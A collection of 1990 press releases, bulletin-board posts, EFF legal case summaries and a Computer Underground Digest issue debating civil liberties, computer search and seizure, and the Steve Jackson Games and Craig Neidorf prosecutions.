private contributions by Kapor and Steve Wozniak, co-founder of Apple Computer, Inc. The Foundation expects to actively raise contributions from a wide constituency. As an initial step to foster public education on these issues, the Foundation today awarded a grant to the Palo Alto, California-based public advocacy group Computer Professionals for Social Responsibility (CPSR). The grant will be used by CPSR to expand the scope of its on-going Computing and Civil Liberties Project (see attached). Because its mission is to not only increase public awareness about civil liberties issues arising in the area of computer-based communications, but also to support litigation in the public interest, the Foundation has recently intervened on behalf of two legal cases. The first case concerns Steve Jackson, an Austin-based game manufacturer who was the target of the Secret Service's Operation Sun Devil. The EFF has pressed for a full disclosure by the government regarding the seizure of his company's computer equipment. In the second action, the Foundation intends to seek amicus curiae (friend of the court) status in the government's case against Craig Neidorf, a 20-year-old University of Missouri student who is the editor of the electronic newsletter Phrack World News (see attached). "It is becoming increasingly obvious that the rate of technology advancement in communications is far outpacing the establishment of appropriate cultural, legal and political frameworks to handle the issues that are arising," said Kapor. "And the Steve Jackson and Neidorf cases dramatically point to the timeliness of the Foundation's mission. We intend to be instrumental in helping shape a new framework that embraces these powerful new technologies for the public good." The use of new digital media -- in the form of on-line information and interactive conferencing services, computer networks and electronic bulletin boards -- is becoming widespread in businesses and homes. However, the electronic society created by these new forms of digital communications does not fit neatly into existing, conventional legal social structures. The question of how electronic communications should be accorded the same political freedoms as newspapers, books, journals and other modes of discourse is currently the subject of discussion among this country's lawmakers and members of the computer industry. The EFF will take an active role in these discussions through its continued funding of various educational projects and forums. An important facet of the Foundation's mission is to help both the public and policy-makers see and understand the opportunities as well as the challenges posed by developments in computing and telecommunications. Also, the EFF will encourage and support the development of new software to enable non-technical users to more easily use their computers to access the growing number of digital communications services available. The Foundation is located in Cambridge, Mass. Requests for information should be sent to Electronic Frontier Foundation, One Cambridge Center, Suite 300, Cambridge, MA 02142, 617/577-1385, fax 617/225-2347; or it can be reached at the Internet mail address eff@well.sf.ca.us.
hackers.45 dejanr,
FOR IMMEDIATE RELEASE Contact: Marc Rotenberg (202) 775-1588 CPSR TO UNDERTAKE EXPANDED CIVIL LIBERTIES PROGRAM Washington, D.C., July 10, 1990 -- Computer Professionals for Social Responsibility (CPSR), a national computing organization, announced today that it would receive a two-year grant in the amount of $275,000 for its Computing and Civil Liberties Project. The Electronic Frontier Foundation (EFF),founded by Mitchell Kapor, made the grant to expand ongoing CPSR work on civil liberties protections for computer users. At a press conference in Washington today, Mr. Kapor praised CPSR's work, "CPSR plays an important role in the computer community. For last several years, it has sought to extend civil liberties protections to new information technologies. Now we want to help CPSR expand that work." Marc Rotenberg, director of the CPSR Washington Office said, "We are obviously very happy about the grant from the EFF. There is a lot of work that needs to be done to ensure that our civil liberties protections are not lost amidst policy confusion about the use of new computer technologies." CPSR said that it will host a series of policy round tables in Washington, DC, during the next two years with lawmakers, computer users, including (hackers), the FBI, industry representatives, and members of the computer security community. Mr. Rotenberg said that the purpose of the meetings will be to "begin a dialogue about the new uses of electronic media and the protection of the public interest." CPSR also plans to develop policy papers on computers and civil liberties, to oversee the Government's handling of computer crime investigations, and to act as an information resource for organizations and individuals interested in civil liberties issues. The CPSR Computing and Civil Liberties project began in 1985 after President Reagan attempted to restrict access to government computer systems through the creation of new classification authority. In 1988, CPSR prepared a report on the proposed expansion of the FBI's computer system, the National Crime Information Center. The report found serious threats to privacy and civil liberties. Shortly after the report was issued, the FBI announced that it would drop a proposed computer feature to track the movements of people across the country who had not been charged with any crime. "We need to build bridges between the technical community and the policy community," said Dr. Eric Roberts, CPSR president and a research scientist at Digital Equipment Corporation in Palo Alto, California. "There is simply too much misinformation about how computer networks operate. This could produce terribly misguided public policy." CPSR representatives have testified several times before Congressional committees on matters involving civil liberties and computer policy. Last year CPSR urged a House Committee to avoid poorly conceived computer activity. "In the rush to criminalize the malicious acts of the few we may discourage the beneficial acts of the many," warned CPSR. A House subcommittee recently followed CPSR's recommendations on computer crime amendments. Dr. Ronni Rosenberg, an expert on the role of computer scientists and public policy, praised the new initiative. She said, "It's clear that there is an information gap that needs to be filled. This is an important opportunity for computer scientists to help fill the gap." CPSR is a national membership organization of computer professionals, based in Palo Alto, California. CPSR has over 20,000 members and 21 chapters across the country. In addition to the civil liberties project, CPSR conducts research, advises policy makers and educates the public about computers in the workplace, computer risk and reliability, and international security. For more information contact: Marc Rotenberg CPSR Washington Office 1025 Connecticut Avenue, NW Suite 1015 Washington, DC 20036 202/775-1588 Gary Chapman CPSR National Office P.O. Box 717 Palo Alto, CA 94302 415/322-3778
hackers.46 dejanr,
Msg#:24282 *POLITICAL FORUM* 07-12-90 10:50:29 From: TONY CREMONESE To: ALL Subj: COMPUTER SEARCH & SEIZURE, PT 1 Please post this without attribution to me (anonymously). I've gotten too much hate mail and nuisance phone calls from hackers to want more, and from the postings I've seen here, that type of person may be the majority of your audience. ------------------------------------------------------------------- Following are various random thoughts and reactions of a retired semi-hacker to thingsthat have appeared in the digest of late: 1) Quoting the maximum possible penalty for various crimes is not "fair" in the sense that those maximum sentences are seldom imposed. Saying that the LoD folks, with no prior record, and (apparently) minimal or no damage caused, are going to face 50 years in prison, is an attempt to incite the reader. Most of those laws specify a range of penalties that reflect the severity of the crime. For instance, Robert Morris (who did more damage than the LoD folks, as near as I can tell) only got a token fine and a probated sentence. If the LoD folks even get convicted (doubtful, I would guess), then their sentence cannot possibly be the maximum. Federal sentencing guidelines would not allow it, and no judicial review would uphold it. The extreme penalties are in place for extreme crimes. If someone mucked about with a computer and caused multiple deaths, or crashed the FedWire computers for a half day -- that would be more deserving of a major sentence. The law is written to cover a range. Let's try to be more realistic about this aspect of things, okay? 2) Confiscation of equipment during search warrants. Well, how would YOU do it? Pretend you are a Federal agent. Figure that you have to search for evidence of wrong-doing on the computer system of someone who you (rightly or wrongly) suspect has been involved in illegal computer activity. Let's leave behind the question of whether the search warrants of late are justified or not, or whether the agents involved have been overdoing; doesn't matter for this little exercise. Instead, put yourself in the role of the person who has sufficient reason so suspect someone of a crime that it is your duty to investigate. You need to be thorough, and find the evidence if it is there. You are a Fed with a valid, fair search warrant. Consider some of the problems: * There may be gigabytes of information on disks, tapes, and optical media that has to be searched, file by file. * You also have to search the "free list" where files may have been deleted because sometimes evidence is found there. You need to do this on every disk, using something like Norton Utilities. * You may have to try to decrypt some files, or figure out what format they use. * Some evidence may be hidden in other ways on the machine (use your imagination a little here -- I'm sure you can think of some ways to do it). You have to search it out. You've only got one or two people to search the machine, but those persons are also assigned to a dozen other cases. Could you do a comprehensive search in a few days? A week? To do an effective search of that much material would probably take many, many weeks. And remember, the person whose equipment you arr searching is somewhat (or very) knowledgeable, and has probably tried to hide the information in some way, so you have to work extra hard to search. Sure they're bitching and moaning about how they can't continue their business without their equipment, but what can *you* do about it if you are going to do your job right? Then there are other problems: * The machine you are searching may have non-standard hardware and software. You can't just transfer the disks to another machine and read them. If nothing else, the heads may be out of alignment on the suspect's machine, making the disks unreadable anywhere else. * The machines you are searching may require special peripherals to print/run/read data. Your system doesn't have an optical disk, or 8mm tape unit, or maybe even a 3.25 disk drive. * You have a small budget for equipment and don't have anything big enough or fast enough to search the data created by complex machines being searched. * You don't have the budget or time to make copies of all the data and take the data with you (even in bulk quantities and high speed, how much would it take for you to copy 500Mb onto floppies?) * Because of chain of custody requirements for the search, you have to be able to certify that the evidence was under the control of responsible people the whole time from the execution of the warrant up until the introduction of trial. That means you can't go home for the night, then come back the next day. * You can't ask the suspect to help -- he may have function keys, booby-traps, or other things in place to erase or alter the evidence you're after. You can't let him near the system, or even near anything that might signal to the system. How do you address these issues? By taking the whole set of equipment involved in the search and using it to do the searching and printing. You know it is compatible with the data you are searching, and it probably has sufficient capacity to do the search. Suppose you find incriminating evidence, or at least material that needs to be presented as evidence. What do you do? Well, you can't just print it out or make a floppy copy and then hand the machine back. There is a concept of "best evidence" involved that means you probably need the original form. Plus, naive jurors have a hard time relating the data, the original computer, and copies of the data; defense lawyers like to capitalize on that. Take a copy into court, and an ignorant judge might rule that it can't be used in evidence. How to address the problem? Keep the machine and storage until after the trial. It is very easy for people to criticize the law enforcement personnel for their searches. Perhaps they *should* be criticized for their selection of suspects and their flair for dramatics, in some (many?) cases. But if you are going to criticize, then come up with a *reasonable* alternative that can be used. I originally thought that seizure of the equipment was too extreme, but the more I thought about the problem, the more I realized that in many cases the authorities have no choice if they are to do a thorough and useful search. I know that if someone wanted to search my systems, it would take them weeks. Heck, I have so much stuff on disk and tape, it sometimes takes me more than a day to find what I want, and I'm the one who organized it all! 3) Prosecution, etc. Suppose you have evidence that someone had broken into the computers at Bank XYZ and made copies of a few harmless files. What do you do? Well, one thing is for certain. You don't believe them if they say they were only looking around. If you did, then *everyone* caught trespassing or committing larceny would use the same line. Everybody "casing" the system for a later. major theft would make the same claim -- they were just looking. How do you prove otherwise? So, do you wait for them to get back on and steal something important or cause major damage? No, that has obvious drawbacks, too. If you have the evidence that a crime has been committed, then you prosecute it before a larger crime is committed. It may look petty, but you don't take chances with other people's property or lives I'm not going to start a debate on whether or not charges in a certain case are too extreme, or whether the law provides too harsh a penalty for some transgressions. Besides, we might all agree on that. :-) However, from a standpoint of security, you never want to allow unauthorized people to snoop on your system, whether they are causing harm or not; from a law enforcement view, you don't wait for people to commit repeated major felonies if you can nail them on what they've already done. Because people steal and lie, it makes it impossible to give the benefit of the doubt to the majority who really don't mean much harm. My machine has been broken into and sabotaged; as such, I will never again believe anyone who claims they were "just looking" and I will prosecute trespassers if I can. That's too bad for the harmless hacker, but the harmless hacker had better realize that assholes have spoiled the environment we all once enjoyed. The more people keep breaking into systems, or worse, the more the lawmakers and law enforcement type are going to press back and make noise about the problems. Think it's bad now? Then just keep hacking into systems and provide ammunition to the know-nothings who may start suggesting laws like registration of modems or licensing people to have PCs. 4) Definitions, the law, etc. First of all, I'm not surprised that you have so little comment in this list from law enforcement types and others of their mind-set. Part of that may be due to the fact that they don't have network access. Believe it or not, there are only a few dozen Fed agents with the computer expertise to know how to access the net. And the US Govt has not allocated much in the way of funds to build up computers and technology for law enforcement. Just because they're the govt doesn't mean they have lots of equipment, personnel, or training. Believe me, I speak from first-hand experience on this. There's another reason, too, and it's related to my request to post this anonymously. I believe myself to be fairly middle of the road on many of these legal issues, and what I've read so far in this digest is very extreme (and sometimes insulting) to people in law enforcement. I wonder if people on this list can be objective enough to try to see the other side of the issue -- is it worth my while to try to suggest even so much as balance here? Again, it is very easy to criticize, but I don't see anyone trying to think objectively about the underlying problems and try to suggest better solutions. The base problem isn't that there are "evil" law enforcement people out there trying to bash computer users. It's because there are irresponsible people breaking the law, and the law enforcement folks are unsophisticated and uneducated about what they're trying to stop. Yes, there is no question that there are abuses of the law and the system. Yes, there is no question that there are some problems with the system. Yes, there is no questionthat there are some stuck-up people in the legal system who enjoy bullying others. BUT There are also people breaking into systems they have no right to access...and it doesn't matter why they do it or whether they harm anything, it is wrong and illegal. There are people committing fraud against banks, credit card companies, and telecommunications companies -- against all of us. There are instances of industrial and political espionage going on. There are computer-run racist hate groups, kiddie porn rings, and conspiracies to commit all kinds of awful things. How would you write the laws so that illegal activity could be prosecuted appropriately without endangering the rights of the innocent? Instead of being critical, let's see some of you "authorities" apply your expertise to something constructive! Suggest how we can write good laws that work but can't be abused. This would be a good forum for that. If we come up with some good suggestions, I suspect we could even get them into more appropriate forums. But we have to have reasonable ideas, first, not simply cries of "foul" that fail to acknowledge that there are real criminals out there amongst the rest of us.
hackers.47 dejanr,
Msg#:24292 *POLITICAL FORUM* 07-12-90 14:58:09 From: JIM TRUDEAU To: TONY CREMONESE Subj: REPLY TO MSG# 24283 (COMPUTER SEARCH & SEIZURE, PT 2) I suspect our anonymous informant is a law enforcement person, because he seems to know whereof he speaks. His points about the chain of custody of evidence, and the requirement for originals in court are absolutely correct. And the point concerning the media hype about maximum possible sentence if given the full penalty and consecutive sentences is also right on. It rarely happens, if ever (although I'm sure Jim Bakker would argue with me about that along with his new friends). This makes an interesting contrast to the very well written article (Hack.arc?) uploaded here recently. They refer to the same folks, the legion of doom (LoD). Both authors agree that what's going on here is that the cops don't know doodoo from donuts about computers, and some serious education is needed here before we all end up in trouble.
hackers.48 dejanr,
========================== security/main #801, from roedy, 947 chars, Wed Jul 18 18:03:54 1990 There is/are comment(s) on this message. -------------------------- TITLE: The Cuckoo's Egg I stayed up this 7:30 AM reading this tale of tracking down a hacker. Sprinkled in the story was info on security leaks. 1. In VAX and Unix software often comes with accounts set up with default passwords. Managers fail to change them to something unique. 2. People put high level passwords and access procedures in files and EMAIL that can be intercepted by hackers. 3. Priviledged programs often have bugs so they can be tricked into opening the security door. Manufacturers don't like braying to loudly when they send out the fixes. So the fixes never get applied. 4. Trap-door encrypted passwords can be cracked by stealing the password file, then encrypting every word in the dictionary and looking for matches. This is why you should never use English words or names as passwords. 5. The easiest way to get high level passwords is to set up a program that mimics the standard logon. ========================== security/main #802, from bstrauss, 94 chars, Wed Jul 18 18:22:21 1990 This is a comment to message 801. There are additional comments to message 801. -------------------------- All very simple security precautions - which a shocking few systems implement... -----Burton ========================== security/main #803, from hkenner, 71 chars, Wed Jul 18 19:56:30 1990 This is a comment to message 801. There is/are comment(s) on this message. -------------------------- Roedy, didn't you see my review of that (excellent) book in BYTE? --HK ========================== security/main #804, from p.schmidt, 918 chars, Wed Jul 18 20:06:37 1990 This is a comment to message 799. There is/are comment(s) on this message. -------------------------- I read (or at least skimmed) a fair portion of the file, and intend to read more later. The article is obviously (to me) slanted; it makes the crackers out to be somewhat unruly but essentially innocent kids. Well, maybe the majority of them are. However. 1) I can't trust this group of crackers to _not_ do anything truly dangerous. 2) Even if they do not have the power to trash my credit rating, hearing a threat to do so would elicit a great deal of fear. I compare this to someone who claims to a bank teller that s/he has a bomb, even if s/he doesn't. I'm sorry if a crackdown curtails some otherwise innocent, harmless, and possibly educational activities for some people. We can't tell from here that they _are_ truly harmless. OTOH, I'm willing to accept that some of the crackdowns/seizures have been handled overzealously and ignorantly. We do need computer literate law officers in a big way. ========================== security/main #805, from roedy, 211 chars, Wed Jul 18 20:13:44 1990 This is a comment to message 803. -------------------------- No, I didn't, but I was talking with a guy who wanted some password protected modems about the book. He had seen it but could not remember which publication. Byte and PC are beginning to look too much alike. ========================== security/main #806, from roedy, 435 chars, Wed Jul 18 20:17:21 1990 This is a comment to message 804. There is/are comment(s) on this message. -------------------------- If you read the book in full you will find your first impression is the exact opposite of the author's. He was frustrated to pieces he could not convince others what he was seeing was a criminal violation -- an act of vandalism. Whenever he watched the hacker break into medical computers he sounds RED with fury. He rewrote an emotionally neutral set of FBI questions into flesh and blood language. "penetrator" became "eggsucker". ========================== security/main #807, from hshubs, 85 chars, Wed Jul 18 21:06:59 1990 This is a comment to message 806. -------------------------- Paul appears to be referring to the message in 'mac.hack/long.stuff', not the book.
hackers.49 dejanr,
TITLE: Electronic Frontier Foundation Case Summaries Date: Sat, 21 Jul 90 12:01:33 PDT Sender: well!jef@apple.com Status: R The following is a discussion of legal issues currently engaged by the Electronic Frontier Foundation. It is about 30k. ELECTRONIC FRONTIER FOUNDATION LEGAL CASE SUMMARY July 10, 1990 The Electronic Frontier Foundation is currently providing litigation support in two cases in which it perceived there to be substantial civil liberties concerns which are likely to prove important in the overall legal scheme by which electronic communications will, now and in the future, be governed, regulated, encouraged, and protected. Steve Jackson Games Steve Jackson Games is a small, privately owned adventure game manufacturer located in Austin, Texas. Like most businesses today, Steve Jackson Games uses computers for word processing and bookkeeping. In addition, like many other manufacturers, the company operates an electronic bulletin board to advertise and to obtain feedback on its product ideas and lines. One of the company's most recent products is GURPS CYBERPUNK, a science fiction role-playing game set in a high-tech futuristic world. The rules of the game are set out in a game book. Playing of the game is not performed on computers and does not make use of computers in any way. This game was to be the company's most important first quarter release, the keystone of its line. On March 1, 1990, just weeks before GURPS CYBERPUNK was due to be released, agents of the United States Secret Service raided the premises of Steve Jackson Games. The Secret Service: * seized three of the company's computers which were used in the drafting and designing of GURPS CYBERPUNK, including the computer used to run the electronic bulletin board, * took all of the company software in the neighborhood of the computers taken, * took with them company business records which were located on the computers seized, and * destructively ransacked the company's warehouse, leaving many items in disarray. In addition, all working drafts of the soon-to-be-published GURPS CYBERPUNK game book -- on disk and in hard-copy manuscript form -- were confiscated by the authorities. One of the Secret Service agents told Steve Jackson that the GURPS CYBERPUNK science fiction fantasy game book was a, "handbook for computer crime." Steve Jackson Games was temporarily shut down. The company was forced to lay-off half of its employees and, ever since the raid, has operated on relatively precarious ground. Steve Jackson Games, which has not been involved in any illegal activity insofar as the Foundation's inquiries have been able to determine, tried in vain for over three months to find out why its property had been seized, why the property was being retained by the Secret Service long after it should have become apparent to the agents that GURPS CYBERPUNK and everything else in the company's repertoire were entirely lawful and innocuous, and when the company's vital materials would be returned. In late June of this year, after attorneys for the Electronic Frontier Foundation became involved in the case, the Secret Service finally returned most of the property, but retained a number of documents, including the seized drafts of GURPS CYBERPUNKS. The Foundation is presently seeking to find out the basis for the search warrant that led to the raid on Steve Jackson Games. Unfortunately, the application for that warrant remains sealed by order of the court. The Foundation is making efforts to unseal those papers in order to find out what it was that the Secret Service told a judicial officer that prompted that officer to issue the search warrant. Under the Fourth Amendment to the United States Constitution, a search warrant may be lawfully issued only if the information presented to the court by the government agents demonstrates "probable cause" to believe that evidence of criminal conduct would be found on the premises to be searched. Unsealing the search warrant application should enable the Foundation's lawyers, representing Steve Jackson Games, to determine the theory by which Secret Service Agents concluded or hypothesized that either the GURPS CYBERPUNK game or any of the company's computerized business records constituted criminal activity or contained evidence of criminal activity. Whatever the professed basis of the search, its scope clearly seems to have been unreasonably broad. The wholesale seizure of computer software, and subsequent rummaging through its contents, is precisely the sort of general search that the Fourth Amendment was designed to prohibit. If it is unlawful for government agents to indiscriminately seize all of the hard-copy filing cabinets on a business premises -- which it surely is -- that the same degree of protection should apply to businesses that store information electronically. The Steve Jackson Games situation appears to involve First Amendment violations as well. The First Amendment to the United States Constitution prohibits the government from "abridging the freedom of speech, or of the press". The government's apparent attempt to prevent the publication of the GURPS CYBERPUNK game book by seizing all copies of all drafts in all media prior to publication, violated the First Amendment. The particular type of First Amendment violation here is the single most serious type, since the government, by seizing the very material sought to be published, effectuated what is known in the law as a "prior restraint" on speech. This means that rather than allow the material to be published and then seek to punish it, the government sought instead to prevent publication in the first place. (This is not to say, of course, that anything published by Steve Jackson Games could successfully have been punished. Indeed, the opposite appears to be the case, since SJG's business seems to be entirely lawful.) In any effort to restrain publication, the government bears an extremely heavy burden of proof before a court is permitted to authorize a prior restraint. Indeed, in its 200-year history, the Supreme Court has never upheld a prior restraint on the publication of material protected by the First Amendment, warning that such efforts to restrain publication are presumptively unconstitutional. For example, the Department of Justice was unsuccessful in 1971 in obtaining the permission of the Supreme Court to enjoin The New York Times, The Washington Post, and The Boston Globe from publishing the so-called Pentagon Papers, which the government strenuously argued should be enjoined because of a perceived threat to national security. (In 1979, however, the government sought to prevent The Progressive magazine from publishing an article purporting to instruct the reader as to how to manufacture an atomic bomb. A lower federal court actually imposed an order for a temporary prior restraint that lasted six months. The Supreme Court never had an opportunity to issue a full ruling on the constitutionality of that restraint, however, because the case was mooted when another newspaper published the article.) Governmental efforts to restrain publication thus have been met by vigorous opposition in the courts. A major problem posed by the government's resort to the expedient of obtaining a search warrant, therefore, is that it allows the government to effectively prevent or delay publication without giving the citizen a ready opportunity to oppose that effort in court. The Secret Service managed to delay, and almost to prevent, the publication of an innocuous game book by a legitimate company -- not by asking a court for a prior restraint order that it surely could not have obtained, but by asking instead for a search warrant, which it obtained all too readily. The seizure of the company's computer hardware is also problematic, for it prevented the company not only from publishing GURPS CYBERPUNK, but also from operating its electronic bulletin board. The government's action in shutting down such an electronic bulletin board is the functional equivalent of shutting down printing presses of The New York Times or The Washington Post in order to prevent publication of The Pentagon Papers. Had the government sought a court order closing down the electronic bulletin board, such an order effecting a prior restraint almost certainly would have been refused. Yet by obtaining the search warrant, the government effected the same result. This is a stark example of how electronic media suffer under a less stringent standard of constitutional protection than applies to the print media -- for no apparent reason, it would appear, other than the fact that government agents and courts do not seem to readily equate computers with printing presses and typewriters. It is difficult to understand a difference between these media that should matter for constitutional protection purposes. This is one of the challenges facing the Electronic Frontier Foundation. The Electronic Frontier Foundation will continue to press for return of the remaining property of Steve Jackson Games and will take formal steps, if necessary, to determine the factual basis for the search. The purpose of these efforts is to establish law applying the First and Fourth Amendments to electronic media, so as to protect in the future Steve Jackson Games as well as other individuals and businesses from the devastating effects of unlawful and unconstitutional government intrusion upon and interference with protected property and speech rights.
hackers.50 dejanr,
United States v. Craig Neidorf Craig Neidorf is a 20-year-old student at the University of Missouri who has been indicted by the United States on several counts of interstate wire fraud and interstate transportation of stolen property in connection with his activities as editor and publisher of the electronic magazine, Phrack. The indictment charges Neidorf with: (1) wire fraud and interstate transportation of stolen property for the republication in Phrack of information which was allegedly illegally obtained through the accessing of a computer system without authorization, though it was obtained not by Neidorf but by a third party; and (2) wire fraud for the publication of an announcement of a computer conference and for the publication of articles which allegedly provide some suggestions on how to bypass security in some computer systems. The information obtained without authorization is a file relating to the provision of 911 emergency telephone services that was allegedly removed from the BellSouth computer system without authorization. It is important to note that neither the indictment, nor any briefs filed in this case by the government, contain any factual allegation or contention that Neidorf was involved in or participated in the removal of the 911 file. These indictments raise substantial constitutional issues which have significant impact on the uses of new computer communications technologies. The prosecution of an editor or publisher, under generalized statutes like wire fraud and interstate transportation of stolen property, for the publication of information received lawfully, which later turns out to be have been "stolen," presents an unprecedented threat to the freedom of the press. The person who should be prosecuted is the thief, and not a publisher who subsequently receives and publishes information of public interest. To draw an analogy to the print media, this would be the equivalent of prosecuting The New York Times and The Washington Post for publishing the Pentagon Papers when those papers were dropped off at the doorsteps of those newspapers. Similarly, the prosecution of a publisher for wire fraud arising out of the publication of articles that allegedly suggested methods of unlawful activity is also unprecedented. Even assuming that the articles here did advocate unlawful activity, advocacy of unlawful activity cannot constitutionally be the basis for a criminal prosecution, except where such advocacy is directed at producing imminent lawless action, and is likely to incite such action. The articles here simply do not fit within this limited category. The Supreme Court has often reiterated that in order for advocacy to be criminalized, the speech must be such that the words trigger an immediate action. Criminal prosecutions such as this pose an extreme hazard for First Amendment rights in all media of communication, as it has a chilling effect on writers and publishers who wish to discuss the ramifications of illegal activity, such as information describing illegal activity or describing how a crime might be committed. In addition, since the statutes under which Neidorf is charged clearly do not envision computer communications, applying them to situations such as that found in the Neidorf case raises fundamental questions of fair notice -- that is to say, the publisher or computer user has no way of knowing that his actions may in fact be a violation of criminal law. The judge in the case has already conceded that "no court has ever held that the electronic transfer of confidential, proprietary business information from one computer to another across state lines constitutes a violation of [the wire fraud statute]." The Due Process Clause prohibits the criminal prosecution of one who has not had fair notice of the illegality of his action. Strict adherence to the requirements of the Due Process Clause also minimizes the risk of selective or arbitrary enforcement, where prosecutors decide what conduct they do not like and then seek some statute that can be stretched by some theory to cover that conduct. Government seizure and liability of bulletin board systems During the recent government crackdown on computer crime, the government has on many occasions seized the computers which operate bulletin board systems ("BBSs"), even though the operator of the bulletin board is not suspected of any complicity in any alleged criminal activity. The government seizures go far beyond a "prior restraint" on the publication of any specific article, as the seizure of the computer equipment of a BBS prevents the BBS from publishing at all on any subject. This akin to seizing the word processing and computerized typesetting equipment of The New York Times for publishing the Pentagon Papers, simply because the government contends that there may be information relating to the commission of a crime on the system. Thus, the government does not simply restrain the publication of the "offending" document, but it seizes the means of production of the First Amendment activity so that no more stories of any type can be published. The government is allowed to seize "instrumentalities of crime," and a bulletin board and its associated computer system could arguably be called an instrumentality of crime if individuals used its private e-mail system to send messages in furtherance of criminal activity. However, even if the government has a compelling interest in interfering with First Amendment protected speech, it can only do so by the least restrictive means. Clearly, the wholesale seizure and retention of a publication's means of production, i.e., its computer system, is not the least restrictive alternative. The government obviously could seize the equipment long enough to make a copy of the information stored on the hard disk and to copy any other disks and documents, and then promptly return the computer system to the operator. Another unconstitutional aspect of the government seizures of the computers of bulletin board systems is the government infringement on the privacy of the electronic mail in the systems. It appears that the government, in seeking warrants for the seizures, has not forthrightly informed the court that private mail of third parties is on the computers, and has also read some of this private mail after the systems have been seized. The Neidorf case also raises issues of great significance to bulletin board systems. As Neidorf was a publisher of information he received, BBSs could be considered publishers of information that its users post on the boards. BBS operators have a great deal of concern as to the liability they might face for the dissemination of information on their boards which may turn out to have been obtained originally without authorization, or which discuss activity which may be considered illegal. This uncertainty as to the law has already caused a decrease in the free flow of information, as some BBS operators have removed information solely because of the fear of liability. The Electronic Frontier Foundation stands firmly against the unauthorized access of computer systems, computer trespass and computer theft, and strongly supports the security and sanctity of private computer systems and networks. One of the goals of the Foundation, however, is to ensure that, as the legal framework is established to protect the security of these computer systems, the unfettered communication and exchange of ideas is not hindered. The Foundation is concerned that the Government has cast its net too broadly, ensnaring the innocent and chilling or indeed supressing the free flow of information. The Foundation fears not only that protected speech will be curtailed, but also that the citizen's reasonable expectation in the privacy and sanctity of electronic communications systems will be thwarted, and people will be hesitant to communicate via these networks. Such a lack of confidence in electronic communication modes will substantially set back the kind of experimentation by and communication among fertile minds that are essential to our nation's development. The Foundation has therefore applied for amicus curiae (friend of the court) status in the Neidorf case and has filed legal briefs in support of the First Amendment issues there, and is prepared to assist in protecting the free flow of information over bulletin board systems and other computer technologies. For further information regarding Steve Jackson Games please contact: Harvey Silverglate or Sharon Beckman Silverglate & Good 89 Broad Street, 14th Floor Boston, MA 02110 617/542-6663 For further information regarding Craig Neidorf please contact: Terry Gross or Eric Lieberman Rabinowitz, Boudin, Standard, Krinsky and Lieberman 740 Broadway, 5th Floor New York, NY 10003 212/254-1111
hackers.52 dejanr,
**************************************************************************** >C O M P U T E R U N D E R G R O U N D< >D I G E S T< *** Volume 1, Issue #1.27 (Aug 9, 1990) ** **************************************************************************** MODERATORS: Jim Thomas / Gordon Meyer (TK0JUT2@NIU.bitnet) ARCHIVISTS: Bob Krause / Alex Smith USENET readers can currently receive CuD as alt.society.cu-digest. COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing information among computerists and to the presentation and debate of diverse views. CuD material may be reprinted as long as the source is cited. It is assumed that non-personal mail to the moderators may be reprinted, unless otherwise specified. Readers are encouraged to submit reasoned articles relating to the Computer Underground. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Contributors assume all responsibility for assuring that articles submitted do not violate copyright protections. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CONTENTS: File 1: Moderators' Corner File 2: From the Mailbag (Response to Neidorf article) File 3: Dr. Ripco Speaks Out File 4: SJG Gurps Cyberpunk ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ---------------------------------------------------------------------- ******************************************************************** *** CuD #1.27, File 1 of 4: Moderators' Comments *** ******************************************************************** Date: 9 August, 1990 From: Moderators Subject: Moderators' Corner ++++++++++ In this file: 1) TAP Address 2) Berserker BBS update 3) Len Rose Update +++++++++++++++++++++++++++++ TAP ADDRESS +++++++++++++++++++++++++++++ The TAP article in CuD 1.26 did not include an address. For those wishing to subscribe, the address is: TAP PO Box 20264 Louisville, KY 40250 +++++++++++++++++++++ Berserker BBS Update +++++++++++++++++++++ In a recent issue of CuD, we inquired about the status of Berserker BBS. We are informed that Berserker still operates, but the number was changed. Good news for Berserker fans. +++++++++++++++++ Len Rose Update +++++++++++++++++ We talked with Len Rose last night, and he indicates that his trial, scheduled for this month, will most likely be delayed until February, 1991. The counts against him resemble those of Craig Neidorf and the "Atlanta 3." We will provide a detailed summary of our conversation as well as a copy of the indictment in CuD 1.28 on Monday. ******************************************************************** >> END OF THIS FILE << *************************************************************************** ------------------------------ Date: 9 August, 1990 From: Moderators Subject: From the Mailbag (Response to Neidorf article) ******************************************************************** *** CuD #1.27: File 2 of 4: From the Mailbag *** ******************************************************************** Date: Thu, 9 Aug 90 10:01:01 -0500 From: Michael J. Hennebry <hennebry@plains.NoDak.edu> Subject: Re: NEIDORF TRIAL OVER! GOVERNMENT DROPS ALL CHARGES! In article <10181@accuvax.nwu.edu> TK0JUT2%NIU.BITNET@uicvm.uic.edu writes: >Neidorf. Defense Attorney Sheldon Zenner said that Prosecutor Bill >Cook's decision was "in line with the highest standards of good >government and ethical conduct." .. The highest standard of good government and ethical conduct would not have allowed prosecution in the first place. If ethics had anything to do with the dismissal the other defendants would have had their "convictions" reversed. >.. Zenner said that the government could >have continued to the last and let the jury decide, but did the >honorable thing. Dropping charges is not the same as acquittal. Perhaps Cook is going to try again and will keep prosecuting and dropping charges until Neidorf runs out of money to defend himself. >Craig Neidorf was ecstatic about the decision, and feels vindicated. >He can now resume his studies, complete his degree, and seriously >consider law school. He *WILL NOT* resume publication of PHRACK! No doubt killing PHRACK was one of the prosecution's goals. >Zenner praised Bill Cook's decision to drop all charges, and added he >is not angry, but appreciative. Zenner also felt that the the efforts Zenner isn't Neidorf. Zenner isn't suffering from the effect of the prosecution. >There are those who have taken the Ed Meese line .. I'm one of them. >..and assumed that >Craig must have done *something* or the government wouldn't be >prosecuting him. .. I'm not one of them. What Meese said was that one who is not guilty is not a suspect. This is true. Neidorf is not guilty, therefore Neidorf was not a suspect, therefore Cook had no right to prosecute him, therefore Cook should be in prison for kidnapping. At the sentencing Neidorf should get to remind the judge that to commit his crime Cook used a deadly weapon, the federal criminal "justice" system. >it was claimed, couldn't respond because it had to protect Craig's >privacy and was required to sit in silence. One prosecutor even said Has government refusal to respond to defense supporters' questions about a prosecution *ever* been to the advantage of a defendant? >There is little cause for Craig's supporters to gloat, because the >emotional and financial toll on Craig and his family were substantial. That was part of the purpose of the prosecution. >Now, however, it is time to move on and address the lessons learned >from the experience. Some of the issues include how computerists can >be protected from overzealousness, .. They can't be protected. Nobody has any protection from overzealous or evil prosecutors. It's called prosecutorial 